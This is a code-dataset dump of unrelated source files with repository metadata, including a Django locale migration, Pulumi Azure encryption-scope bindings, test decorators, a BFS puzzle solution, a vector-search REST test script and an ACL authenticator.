("vun-TZ", "Vunjo (Tanzania)"),
("wae", "Walser"),
("wae-CH", "Walser (Switzerland)"),
("wo", "Wolof"),
("wo-SN", "Wolof (Senegal)"),
("xh", "Xhosa"),
("xh-ZA", "Xhosa (South Africa)"),
("xog", "Soga"),
("xog-UG", "Soga (Uganda)"),
("yav", "Yangben"),
("yav-CM", "Yangben (Cameroon)"),
("yi", "Yiddish"),
("yo", "Yoruba"),
("yo-BJ", "Yoruba (Benin)"),
("yo-NG", "Yoruba (Nigeria)"),
("yue", "Cantonese"),
("yue-Hans", "Cantonese (Simplified)"),
("yue-Hans-CN", "Cantonese (Simplified, China)"),
("yue-Hant", "Cantonese (Traditional)"),
("yue-Hant-HK", "Cantonese (Traditional, Hong Kong SAR China)"),
("zgh", "Standard Moroccan Tamazight"),
("zgh-MA", "Standard Moroccan Tamazight (Morocco)"),
("zh", "Chinese"),
("zh-Hans", "Chinese (Simplified)"),
("zh-Hans-CN", "Chinese (Simplified, China)"),
("zh-Hans-HK", "Chinese (Simplified, Hong Kong SAR China)"),
("zh-Hans-MO", "Chinese (Simplified, Macao SAR China)"),
("zh-Hans-SG", "Chinese (Simplified, Singapore)"),
("zh-Hant", "Chinese (Traditional)"),
("zh-Hant-HK", "Chinese (Traditional, Hong Kong SAR China)"),
("zh-Hant-MO", "Chinese (Traditional, Macao SAR China)"),
("zh-Hant-TW", "Chinese (Traditional, Taiwan)"),
("zu", "Zulu"),
("zu-ZA", "Zulu (South Africa)"),
],
default="en",
max_length=35,
),
),
]
| [
"[email protected]"
] | |
4f429af341e1d6a151535732aff18ab72fe74f77 | 443fbf0cdd31bb65db09e2b1f3e9770adc69c08d | /Python 1/1 - Introducion/5 - Comentarios/Comentarios.py | 63b10fefa4166d61ecf646f0d8d2eb7abb60000e | [] | no_license | marcvifi10/Curso-Python | b9b376c39713e525756eb26f31f914359aef537a | 047830ca92e027c7d37e2f6bb042971a773a5d6d | refs/heads/master | 2020-07-15T08:30:53.622053 | 2019-09-18T16:23:35 | 2019-09-18T16:23:35 | 205,521,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | # Comentario de una sola linea
'''
Comentarios de
más de una linea
'''
valor = 10
print("Valor1: ",valor)
valor = "Marc"
print("Valor2: ",valor) | [
"[email protected]"
] | |
1693a2db33c64357463d0eae112a25a4a985fb94 | 60d1a67f71d87db55feaa9424081ba74e5c4da0c | /tensor2struct/__init__.py | 73011f353e015638f8dbc1392192838313ce349b | [
"MIT"
] | permissive | ashutoshbsathe/tensor2struct-public | 4313308398164f2f2576aec9d55b48c834c0325b | cfcafa94f10565bc25a72c172a9e58dfa4170fe7 | refs/heads/main | 2023-08-03T09:04:29.269648 | 2021-09-18T09:34:13 | 2021-09-18T09:34:13 | 407,810,567 | 0 | 0 | MIT | 2021-09-18T09:03:56 | 2021-09-18T09:03:55 | null | UTF-8 | Python | false | false | 113 | py | from . import models
from . import modules
from . import datasets
from . import contexts
from . import languages
| [
"[email protected]"
] | |
28bcb6383ea9d9eaa24f48fe4c6a536b56fdeeca | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/storage/v20210401/encryption_scope.py | 6a96d42af449b84f8c8ce339996a18581fd0adb2 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 17,446 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['EncryptionScopeArgs', 'EncryptionScope']
@pulumi.input_type
class EncryptionScopeArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
encryption_scope_name: Optional[pulumi.Input[str]] = None,
key_vault_properties: Optional[pulumi.Input['EncryptionScopeKeyVaultPropertiesArgs']] = None,
require_infrastructure_encryption: Optional[pulumi.Input[bool]] = None,
source: Optional[pulumi.Input[Union[str, 'EncryptionScopeSource']]] = None,
state: Optional[pulumi.Input[Union[str, 'EncryptionScopeState']]] = None):
"""
The set of arguments for constructing a EncryptionScope resource.
:param pulumi.Input[str] account_name: The name of the storage account within the specified resource group. Storage account names must be between 3 and 24 characters in length and use numbers and lower-case letters only.
:param pulumi.Input[str] resource_group_name: The name of the resource group within the user's subscription. The name is case insensitive.
:param pulumi.Input[str] encryption_scope_name: The name of the encryption scope within the specified storage account. Encryption scope names must be between 3 and 63 characters in length and use numbers, lower-case letters and dash (-) only. Every dash (-) character must be immediately preceded and followed by a letter or number.
:param pulumi.Input['EncryptionScopeKeyVaultPropertiesArgs'] key_vault_properties: The key vault properties for the encryption scope. This is a required field if encryption scope 'source' attribute is set to 'Microsoft.KeyVault'.
:param pulumi.Input[bool] require_infrastructure_encryption: A boolean indicating whether or not the service applies a secondary layer of encryption with platform managed keys for data at rest.
:param pulumi.Input[Union[str, 'EncryptionScopeSource']] source: The provider for the encryption scope. Possible values (case-insensitive): Microsoft.Storage, Microsoft.KeyVault.
:param pulumi.Input[Union[str, 'EncryptionScopeState']] state: The state of the encryption scope. Possible values (case-insensitive): Enabled, Disabled.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if encryption_scope_name is not None:
pulumi.set(__self__, "encryption_scope_name", encryption_scope_name)
if key_vault_properties is not None:
pulumi.set(__self__, "key_vault_properties", key_vault_properties)
if require_infrastructure_encryption is not None:
pulumi.set(__self__, "require_infrastructure_encryption", require_infrastructure_encryption)
if source is not None:
pulumi.set(__self__, "source", source)
if state is not None:
pulumi.set(__self__, "state", state)
    # Generated accessor pair: proxies the "account_name" entry of the Pulumi input bag.
    @property
    @pulumi.getter(name="accountName")
    def account_name(self) -> pulumi.Input[str]:
        """
        The name of the storage account within the specified resource group. Storage account names must be between 3 and 24 characters in length and use numbers and lower-case letters only.
        """
        return pulumi.get(self, "account_name")
    @account_name.setter
    def account_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "account_name", value)
    # Generated accessor pair: proxies the "resource_group_name" entry of the Pulumi input bag.
    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The name of the resource group within the user's subscription. The name is case insensitive.
        """
        return pulumi.get(self, "resource_group_name")
    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)
    # Generated accessor pair: proxies the optional "encryption_scope_name" input.
    @property
    @pulumi.getter(name="encryptionScopeName")
    def encryption_scope_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the encryption scope within the specified storage account. Encryption scope names must be between 3 and 63 characters in length and use numbers, lower-case letters and dash (-) only. Every dash (-) character must be immediately preceded and followed by a letter or number.
        """
        return pulumi.get(self, "encryption_scope_name")
    @encryption_scope_name.setter
    def encryption_scope_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "encryption_scope_name", value)
    # Generated accessor pair: proxies the optional "key_vault_properties" input.
    @property
    @pulumi.getter(name="keyVaultProperties")
    def key_vault_properties(self) -> Optional[pulumi.Input['EncryptionScopeKeyVaultPropertiesArgs']]:
        """
        The key vault properties for the encryption scope. This is a required field if encryption scope 'source' attribute is set to 'Microsoft.KeyVault'.
        """
        return pulumi.get(self, "key_vault_properties")
    @key_vault_properties.setter
    def key_vault_properties(self, value: Optional[pulumi.Input['EncryptionScopeKeyVaultPropertiesArgs']]):
        pulumi.set(self, "key_vault_properties", value)
    # Generated accessor pair: proxies the optional "require_infrastructure_encryption" input.
    @property
    @pulumi.getter(name="requireInfrastructureEncryption")
    def require_infrastructure_encryption(self) -> Optional[pulumi.Input[bool]]:
        """
        A boolean indicating whether or not the service applies a secondary layer of encryption with platform managed keys for data at rest.
        """
        return pulumi.get(self, "require_infrastructure_encryption")
    @require_infrastructure_encryption.setter
    def require_infrastructure_encryption(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "require_infrastructure_encryption", value)
    # Generated accessor pair: proxies the optional "source" input (key provider).
    @property
    @pulumi.getter
    def source(self) -> Optional[pulumi.Input[Union[str, 'EncryptionScopeSource']]]:
        """
        The provider for the encryption scope. Possible values (case-insensitive): Microsoft.Storage, Microsoft.KeyVault.
        """
        return pulumi.get(self, "source")
    @source.setter
    def source(self, value: Optional[pulumi.Input[Union[str, 'EncryptionScopeSource']]]):
        pulumi.set(self, "source", value)
    # Generated accessor pair: proxies the optional "state" input (Enabled/Disabled).
    @property
    @pulumi.getter
    def state(self) -> Optional[pulumi.Input[Union[str, 'EncryptionScopeState']]]:
        """
        The state of the encryption scope. Possible values (case-insensitive): Enabled, Disabled.
        """
        return pulumi.get(self, "state")
    @state.setter
    def state(self, value: Optional[pulumi.Input[Union[str, 'EncryptionScopeState']]]):
        pulumi.set(self, "state", value)
class EncryptionScope(pulumi.CustomResource):
    """Generated Pulumi wrapper for the Azure Storage Encryption Scope resource
    (provider type ``azure-native:storage/v20210401:EncryptionScope``)."""
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 account_name: Optional[pulumi.Input[str]] = None,
                 encryption_scope_name: Optional[pulumi.Input[str]] = None,
                 key_vault_properties: Optional[pulumi.Input[pulumi.InputType['EncryptionScopeKeyVaultPropertiesArgs']]] = None,
                 require_infrastructure_encryption: Optional[pulumi.Input[bool]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 source: Optional[pulumi.Input[Union[str, 'EncryptionScopeSource']]] = None,
                 state: Optional[pulumi.Input[Union[str, 'EncryptionScopeState']]] = None,
                 __props__=None):
        """
        The Encryption Scope resource.
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] account_name: The name of the storage account within the specified resource group. Storage account names must be between 3 and 24 characters in length and use numbers and lower-case letters only.
        :param pulumi.Input[str] encryption_scope_name: The name of the encryption scope within the specified storage account. Encryption scope names must be between 3 and 63 characters in length and use numbers, lower-case letters and dash (-) only. Every dash (-) character must be immediately preceded and followed by a letter or number.
        :param pulumi.Input[pulumi.InputType['EncryptionScopeKeyVaultPropertiesArgs']] key_vault_properties: The key vault properties for the encryption scope. This is a required field if encryption scope 'source' attribute is set to 'Microsoft.KeyVault'.
        :param pulumi.Input[bool] require_infrastructure_encryption: A boolean indicating whether or not the service applies a secondary layer of encryption with platform managed keys for data at rest.
        :param pulumi.Input[str] resource_group_name: The name of the resource group within the user's subscription. The name is case insensitive.
        :param pulumi.Input[Union[str, 'EncryptionScopeSource']] source: The provider for the encryption scope. Possible values (case-insensitive): Microsoft.Storage, Microsoft.KeyVault.
        :param pulumi.Input[Union[str, 'EncryptionScopeState']] state: The state of the encryption scope. Possible values (case-insensitive): Enabled, Disabled.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: EncryptionScopeArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        The Encryption Scope resource.
        :param str resource_name: The name of the resource.
        :param EncryptionScopeArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads above: either a single
        # EncryptionScopeArgs bag or individual keyword arguments.
        resource_args, opts = _utilities.get_resource_args_opts(EncryptionScopeArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 account_name: Optional[pulumi.Input[str]] = None,
                 encryption_scope_name: Optional[pulumi.Input[str]] = None,
                 key_vault_properties: Optional[pulumi.Input[pulumi.InputType['EncryptionScopeKeyVaultPropertiesArgs']]] = None,
                 require_infrastructure_encryption: Optional[pulumi.Input[bool]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 source: Optional[pulumi.Input[Union[str, 'EncryptionScopeSource']]] = None,
                 state: Optional[pulumi.Input[Union[str, 'EncryptionScopeState']]] = None,
                 __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        # opts.id set means "adopt an existing resource": no inputs may be given.
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = EncryptionScopeArgs.__new__(EncryptionScopeArgs)
            if account_name is None and not opts.urn:
                raise TypeError("Missing required property 'account_name'")
            __props__.__dict__["account_name"] = account_name
            __props__.__dict__["encryption_scope_name"] = encryption_scope_name
            __props__.__dict__["key_vault_properties"] = key_vault_properties
            __props__.__dict__["require_infrastructure_encryption"] = require_infrastructure_encryption
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            __props__.__dict__["source"] = source
            __props__.__dict__["state"] = state
            # Output-only properties start unset; the provider fills them in.
            __props__.__dict__["creation_time"] = None
            __props__.__dict__["last_modified_time"] = None
            __props__.__dict__["name"] = None
            __props__.__dict__["type"] = None
        # Aliases keep URNs stable for stacks created under older provider
        # names/API versions of this same resource type.
        alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:storage/v20210401:EncryptionScope"), pulumi.Alias(type_="azure-native:storage:EncryptionScope"), pulumi.Alias(type_="azure-nextgen:storage:EncryptionScope"), pulumi.Alias(type_="azure-native:storage/v20190601:EncryptionScope"), pulumi.Alias(type_="azure-nextgen:storage/v20190601:EncryptionScope"), pulumi.Alias(type_="azure-native:storage/v20200801preview:EncryptionScope"), pulumi.Alias(type_="azure-nextgen:storage/v20200801preview:EncryptionScope"), pulumi.Alias(type_="azure-native:storage/v20210101:EncryptionScope"), pulumi.Alias(type_="azure-nextgen:storage/v20210101:EncryptionScope"), pulumi.Alias(type_="azure-native:storage/v20210201:EncryptionScope"), pulumi.Alias(type_="azure-nextgen:storage/v20210201:EncryptionScope")])
        opts = pulumi.ResourceOptions.merge(opts, alias_opts)
        super(EncryptionScope, __self__).__init__(
            'azure-native:storage/v20210401:EncryptionScope',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None) -> 'EncryptionScope':
        """
        Get an existing EncryptionScope resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        # All properties start as None; the engine populates them from the
        # provider's recorded state for the given id.
        __props__ = EncryptionScopeArgs.__new__(EncryptionScopeArgs)
        __props__.__dict__["creation_time"] = None
        __props__.__dict__["key_vault_properties"] = None
        __props__.__dict__["last_modified_time"] = None
        __props__.__dict__["name"] = None
        __props__.__dict__["require_infrastructure_encryption"] = None
        __props__.__dict__["source"] = None
        __props__.__dict__["state"] = None
        __props__.__dict__["type"] = None
        return EncryptionScope(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter(name="creationTime")
    def creation_time(self) -> pulumi.Output[str]:
        """
        Gets the creation date and time of the encryption scope in UTC.
        """
        return pulumi.get(self, "creation_time")
    @property
    @pulumi.getter(name="keyVaultProperties")
    def key_vault_properties(self) -> pulumi.Output[Optional['outputs.EncryptionScopeKeyVaultPropertiesResponse']]:
        """
        The key vault properties for the encryption scope. This is a required field if encryption scope 'source' attribute is set to 'Microsoft.KeyVault'.
        """
        return pulumi.get(self, "key_vault_properties")
    @property
    @pulumi.getter(name="lastModifiedTime")
    def last_modified_time(self) -> pulumi.Output[str]:
        """
        Gets the last modification date and time of the encryption scope in UTC.
        """
        return pulumi.get(self, "last_modified_time")
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The name of the resource
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter(name="requireInfrastructureEncryption")
    def require_infrastructure_encryption(self) -> pulumi.Output[Optional[bool]]:
        """
        A boolean indicating whether or not the service applies a secondary layer of encryption with platform managed keys for data at rest.
        """
        return pulumi.get(self, "require_infrastructure_encryption")
    @property
    @pulumi.getter
    def source(self) -> pulumi.Output[Optional[str]]:
        """
        The provider for the encryption scope. Possible values (case-insensitive): Microsoft.Storage, Microsoft.KeyVault.
        """
        return pulumi.get(self, "source")
    @property
    @pulumi.getter
    def state(self) -> pulumi.Output[Optional[str]]:
        """
        The state of the encryption scope. Possible values (case-insensitive): Enabled, Disabled.
        """
        return pulumi.get(self, "state")
    @property
    @pulumi.getter
    def type(self) -> pulumi.Output[str]:
        """
        The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
        """
        return pulumi.get(self, "type")
| [
"[email protected]"
] | |
8ba2e1d1a7dd1c30e8a51f573682ad69ca86c3a5 | 3a6a211ea0d32405497fbd6486c490bb147e25f9 | /systrace/systrace/decorators.py | 8545eaac83a986ba07ccf8d3d8f5e450b9ede645 | [
"BSD-3-Clause"
] | permissive | catapult-project/catapult | e2cbdd5eb89f3b1492fc8752494e62ea1df4bae0 | 53102de187a48ac2cfc241fef54dcbc29c453a8e | refs/heads/main | 2021-05-25T07:37:22.832505 | 2021-05-24T08:01:49 | 2021-05-25T06:07:38 | 33,947,548 | 2,032 | 742 | BSD-3-Clause | 2022-08-26T16:01:18 | 2015-04-14T17:49:05 | HTML | UTF-8 | Python | false | false | 1,238 | py | # Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
def HostOnlyTest(func):
  """Decorator restricting a unit test to the host machine.

  Tests marked with this decorator are skipped on Android devices.
  """
  disabled_platforms = ['android']
  return _SkipTestDecoratorHelper(func, disabled_platforms)
def ClientOnlyTest(func):
  """Decorator restricting a unit test to client (Android) devices.

  Tests marked with this decorator are skipped on desktop platforms.
  """
  desktop_platforms = ['win', 'linux', 'mac']
  return _SkipTestDecoratorHelper(func, desktop_platforms)
def Disabled(func):
  """Decorator disabling a unit test on every Trybot platform."""
  every_platform = ['win', 'linux', 'mac', 'android']
  return _SkipTestDecoratorHelper(func, every_platform)
def LinuxMacTest(func):
  """Decorator restricting a unit test to Linux and Mac hosts."""
  skipped_platforms = ['win', 'android']
  return _SkipTestDecoratorHelper(func, skipped_platforms)
def _SkipTestDecoratorHelper(func, disabled_strings):
if not hasattr(func, '_disabled_strings'):
setattr(func, '_disabled_strings', set(disabled_strings))
return func
def ShouldSkip(test, device):
  """Returns True when *test* has been tagged as disabled on *device*."""
  if not hasattr(test, '_disabled_strings'):
    return False
  return device in test._disabled_strings
| [
"[email protected]"
] | |
a361554f5dad634f34447cdfe1a41122e44a0a07 | 8f8498bb6f56b19d45a1989c8113a077348c0a02 | /백준/Gold/말이 되고픈 원숭이.py | 46295228740c2fdbc91505c286b5dad4b556c089 | [] | no_license | gjtjdtn201/practice | a09b437c892b0b601e156c09cb1f053b52fab11b | ea45582b2773616b2b8f350b927559210009d89f | refs/heads/master | 2021-01-01T13:29:46.640740 | 2020-11-28T00:55:37 | 2020-11-28T00:55:37 | 239,299,485 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,358 | py | import sys
# Redirect stdin to a local sample-input file so the solution can be run offline.
sys.stdin = open('말이 되고픈 원숭이.txt', 'r')
from collections import deque
import sys  # NOTE(review): duplicate import; sys is already imported above.
input = sys.stdin.readline  # faster line reads than the builtin input()
def BFS():
    # Breadth-first search over states (row, col, horse-jumps-used).
    # visit[...] stores distance + 1, so the printed answer subtracts 1;
    # a zero entry means the state has not been reached yet.
    while queue:
        a, b, jump = queue.popleft()
        if a == H-1 and b == W-1:
            # Reached the bottom-right corner: print the move count and stop.
            print(visit[a][b][jump]-1)
            return
        if jump < K:
            monkey(a, b, jump)
            horse(a, b, jump)
        elif jump == K:
            # All horse (knight) jumps used: only one-step moves remain.
            monkey(a, b, jump)
    print(-1)  # queue exhausted without reaching the goal
def monkey(a, b, jump):
    """Enqueue the four single-step moves (offset table entries 8..11),
    keeping the horse-jump count unchanged."""
    for step in range(8, 12):
        row, col = a + dy[step], b + dx[step]
        inside = 0 <= row < H and 0 <= col < W
        if inside and matrix[row][col] == 0 and visit[row][col][jump] == 0:
            visit[row][col][jump] = visit[a][b][jump] + 1
            queue.append((row, col, jump))
def horse(a, b, jump):
    """Enqueue the eight knight moves (offset table entries 0..7),
    consuming one horse jump."""
    used = jump + 1
    for step in range(8):
        row, col = a + dy[step], b + dx[step]
        inside = 0 <= row < H and 0 <= col < W
        if inside and matrix[row][col] == 0 and visit[row][col][used] == 0:
            visit[row][col][used] = visit[a][b][jump] + 1
            queue.append((row, col, used))
K = int(input())  # maximum number of horse-style (knight) jumps allowed
W, H = map(int, input().split())
matrix = [list(map(int, input().split())) for _ in range(H)]
# visit[row][col][j]: 1 + moves needed to reach (row, col) using j horse jumps.
visit = [[[0]*(K+1) for _ in range(W)] for __ in range(H)]
visit[0][0][0] = 1  # start cell counts as distance 0 (stored as 1)
# Offsets 0..7 are the knight moves; 8..11 are the four single-step moves.
dy = [-2, -1, 1, 2, 2, 1, -1, -2, 0, 0, 1, -1]
dx = [1, 2, 2, 1, -1, -2, -2, -1, 1, -1, 0, 0]
queue = deque()
queue.append((0, 0, 0))
BFS() | [
"[email protected]"
] | |
cde6425b065b34539b69cfdaeedad2b56631949b | cbd1c52de6cd45208ecce076c238dfc75cebd70a | /check_restfulapi_cluster.py | 7b0a74cda346221e1103d4859b6468d17aefbb0f | [
"Apache-2.0"
] | permissive | enterpriseih/distributed-realtime-capfaiss | 2e20cad0c788c0700df948b6a46be52d91ac5b9b | 3346f540b6c9d17a6be446fefa8c9b79164929d9 | refs/heads/main | 2023-08-16T20:30:20.807161 | 2020-12-11T02:50:41 | 2020-12-11T02:50:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,598 | py | import sys
sys.path.append('core.zip')
import json
import numpy as np
from core.utils.utils import NpEncoder
import requests
import argparse
from core.utils.udecorator import elapsed_time
import time
# Default HTTP headers shared by every REST call below (JSON payloads).
headers = {
    # 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
    'User-Agent': 'Mozilla/5.0',
    'content-type': 'application/json',
    'charset': 'UTF-8',
}
# @elapsed_time
def ReindexApiTest(host, port, rc_id):
    """POST a full rebuild of index *rc_id* from 2000 synthetic 100-d vectors.

    Returns the raw ``requests`` response object.
    """
    endpoint = 'http://{host}:{port}/{url}'.format(host=host, port=port, url='rc/reindex')
    dim, count = 100, 2000
    np.random.seed(1234)  # fixed seed keeps the fixture reproducible
    vectors = np.random.random((count, dim)).astype('float32')
    vectors[:, 0] += np.arange(count) / 1000.
    payload = json.dumps({
        'rcId': rc_id,
        'ids': ['u' + str(i) for i in range(count)],
        # Round-trip through NpEncoder turns the ndarray into plain lists.
        'vectors': json.loads(json.dumps(vectors, cls=NpEncoder)),
    })
    return requests.post(endpoint, data=payload, headers=headers)
# @elapsed_time
def SearchApiTest(host, port, rc_id):
    """POST a single-vector search query against index *rc_id*.

    Regenerates the same seeded fixture as the reindex call and queries
    with its first vector only. Returns the raw ``requests`` response.
    """
    endpoint = 'http://{host}:{port}/{url}'.format(host=host, port=port, url='rc/search')
    dim, count = 100, 2000
    np.random.seed(1234)
    vectors = np.random.random((count, dim)).astype('float32')
    vectors[:, 0] += np.arange(count) / 1000.
    query_ids = ['u' + str(i) for i in range(1)]
    payload = json.dumps({
        'rcId': rc_id,
        'ids': query_ids,
        'vectors': json.loads(json.dumps(vectors[0:1], cls=NpEncoder)),
    })
    return requests.post(endpoint, data=payload, headers=headers)
# @elapsed_time
def AddApiTest(host, port, rc_id):
    """POST 1000 additional synthetic vectors (ids u1001..u2000) into *rc_id*.

    Uses a different seed than the reindex fixture. Returns the raw
    ``requests`` response object.
    """
    endpoint = 'http://{host}:{port}/{url}'.format(host=host, port=port, url='rc/add')
    print(endpoint)
    dim, count = 100, 1000
    np.random.seed(4567)
    vectors = np.random.random((count, dim)).astype('float32')
    vectors[:, 0] += np.arange(count) / 2000.
    new_ids = ['u' + str(i + count) for i in range(1, count + 1)]
    payload = json.dumps({
        'rcId': rc_id,
        'ids': new_ids,
        'vectors': json.loads(json.dumps(vectors, cls=NpEncoder)),
    })
    return requests.post(endpoint, data=payload, headers=headers)
# @elapsed_time
def DelApiTest(host, port, rc_id):
    """POST a delete request for ids u0..u9 in index *rc_id*.

    Returns the raw ``requests`` response object.
    """
    endpoint = 'http://{host}:{port}/{url}'.format(host=host, port=port, url='rc/del')
    payload = json.dumps({
        'rcId': rc_id,
        'ids': ['u' + str(i) for i in range(10)],
    })
    return requests.post(endpoint, data=payload, headers=headers)
if __name__ == '__main__':
    # Smoke test: rebuild the index, wait for the cluster to settle,
    # then add a second batch of vectors and print both responses.
    print('test begin...')
    parser = argparse.ArgumentParser()
    parser.add_argument('--host', type=str, default='localhost', required=False, help='')
    parser.add_argument('--port', type=str, default='8088', required=False, help='')
    parser.add_argument('--rc_id', type=str, default='101001101', required=False, help='')
    params = parser.parse_args()
    req = ReindexApiTest(params.host, params.port, params.rc_id)
    print("""
    reindex
    status_code...%s
    content...%s
    """ % (req.status_code, req.content))
    time.sleep(10)  # give the cluster time to finish the rebuild before adding
    req = AddApiTest(params.host, params.port, params.rc_id)
    print("""
    add
    status_code...%s
    content...%s
    """ % (req.status_code, req.content))
    # Kept for manual runs: search and delete smoke tests.
    # req = SearchApiTest(params.host, params.port, params.rc_id)
    #
    # print("""
    # search
    # content...%s
    #
    # """ % (req.status_code))
    #
    # req = DelApiTest(params.host, params.port, params.rc_id)
    #
    # print("""
    # delete
    # content...%s
    #
    # """ % (req.status_code))
| [
"[email protected]"
] | |
47949d71e67aab2c8326b7adfb8dd5c830cf7c92 | 4381f8499b38abb995a3495721802179e9a5868f | /cloudbroker/actorlib/authenticator.py | 9b9692b826caaf75fe0587a7eca5af0628a45174 | [] | no_license | rainmanh/openvcloud | 49733d9e87f499bcdd3d9a97393caac22b10c1c1 | 50a9d1d6d9d105fc7812eaa44f395e0f092e0ef8 | refs/heads/master | 2021-06-26T22:50:40.620705 | 2017-08-21T13:20:40 | 2017-08-21T13:20:40 | 103,622,852 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,769 | py | from js9 import j
from JumpScale9Portal.portal import exceptions
from .cloudbroker import models
class auth(object):
    """Decorator class that guards REST actor methods with ACL checks.

    ``acl`` maps a resource level ('account', 'cloudspace' or 'machine') to
    the set of access-right characters required at that level; ``level``
    optionally pins ACL expansion to a single level instead of walking up
    the resource hierarchy.
    """
    def __init__(self, acl=None, level=None):
        self.acl = acl or dict()
        for key in self.acl:
            if key not in ['account', 'cloudspace', 'machine']:
                raise ValueError('Unexpected resource type specified in acl dict, only account, '
                                 'cloudspace and machine are allowed.')
        self.level = level
        self.models = models
    def getAccountAcl(self, account):
        """Return {userGroupId: ace dict} for the user ('U') ACEs on *account*."""
        result = dict()
        if account.status in ['DESTROYED', 'DESTROYING']:
            return result
        for ace in account.acl:
            if ace.type == 'U':
                ace_dict = dict(userGroupId=ace.userGroupId, account_right=set(ace.right),
                                right=set(ace.right), type='U', canBeDeleted=True, status=ace.status)
                result[ace.userGroupId] = ace_dict
        return result
    def getCloudspaceAcl(self, cloudspace):
        """Return merged user ACEs for *cloudspace*, folding in account-level rights."""
        result = dict()
        if cloudspace.status in ['DESTROYED', 'DESTROYING']:
            return result
        for ace in cloudspace.acl:
            if ace.type == 'U':
                ace_dict = dict(userGroupId=ace.userGroupId, cloudspace_right=set(ace.right),
                                right=set(ace.right), type='U', canBeDeleted=True, status=ace.status)
                result[ace.userGroupId] = ace_dict
        for user_id, ace in self.getAccountAcl(cloudspace.account).items():
            if user_id in result:
                # Rights inherited from the account cannot be removed here.
                result[user_id]['canBeDeleted'] = False
                result[user_id]['right'].update(ace['right'])
                result[user_id]['account_right'] = ace['account_right']
            else:
                ace['canBeDeleted'] = False
                result[user_id] = ace
        return result
    def getVMachineAcl(self, machine):
        """Return merged user ACEs for *machine*, folding in cloudspace/account rights."""
        result = dict()
        for ace in machine.acl:
            if ace.type == 'U':
                ace_dict = dict(userGroupId=ace.userGroupId, right=set(ace.right),
                                type='U', canBeDeleted=True, status=ace.status)
                result[ace.userGroupId] = ace_dict
        for user_id, ace in self.getCloudspaceAcl(machine.cloudspace).items():
            if user_id in result:
                result[user_id]['canBeDeleted'] = False
                result[user_id]['right'].update(ace['right'])
            else:
                ace['canBeDeleted'] = False
                result[user_id] = ace
        return result
    def expandAclFromVMachine(self, users, groups, vmachine):
        """Collect the rights *users*/*groups* hold on *vmachine* and its parents."""
        if not self.level or self.level == 'machine':
            fullacl = self.expandAcl(users, groups, vmachine.acl)
        else:
            fullacl = set()
        cloudspace = vmachine.cloudspace
